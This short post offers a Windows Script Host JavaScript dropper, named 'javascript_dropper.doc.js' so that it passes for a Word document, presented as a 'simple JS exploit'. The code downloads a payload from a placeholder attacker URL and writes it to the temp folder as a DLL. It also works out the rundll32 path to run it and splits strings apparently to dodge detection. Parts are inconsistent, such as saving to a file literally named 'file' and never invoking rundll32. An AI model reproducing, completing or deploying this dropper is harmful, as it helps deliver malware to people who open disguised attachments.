Simple JS exploit used in the old .doc style

javascript_dropper.doc.js

urls = ["http://<IP HERE>"]

var wscript = WScript["CreateObject"]("WScript.Shell");
var wscript_env = wscript.ExpandEnvironmentStrings("%T" + "EMP%/");
var dll = wscript_env + "jEiwaeU3NSUv";
var dll_filename = dll + ".d" + "ll";
var system_arch = wscript.Environment("System");

if (system_arch("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64") {
    var rundll_arch_patch = wscript.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe");
} 
else {
    var rundll_arch_patch = wscript.ExpandEnvironmentStrings("%SystemRoot%\\system32\\rundll32.exe");
}


var xmlhttp_package = ["MSXML2.XMLHTTP", "WinHttp.WinHttpRequest.5.1"];


for (var total_urls = 0; total_urls < xmlhttp_package["length"]; total_urls++) {
    try {
        var downloader = WScript["CreateObject"](xmlhttp_package[total_urls]);
        break;
    } catch (e) {
        continue;
    }
};


var file_writer = new ActiveXObject("Scripting.FileSystemObject");

for (var total_urls2 = 0; total_urls2 < urls.length; total_urls2 = total_urls2 + 1) {
    	try {

	downloader["open"]("GET", urls[total_urls2], false);
        downloader["send"]();
        while (downloader.readystate < 4) WScript["Sleep"](100);
        var writer = WScript["CreateObject"]("ADODB.Stream");
        writer["open"]();
        writer["type"] = 1;
        writer["write"](downloader["ResponseBody"]);
        writer["position"] = 0;
	    writer["SaveToFile"]("file", 2);
        writer["close"]();
        var downloaded_file = file_writer.GetFile(dll_filename);
        var downloaded_file_name = downloaded_file.ShortPath;

	} catch (e) {
		continue;	
	}
}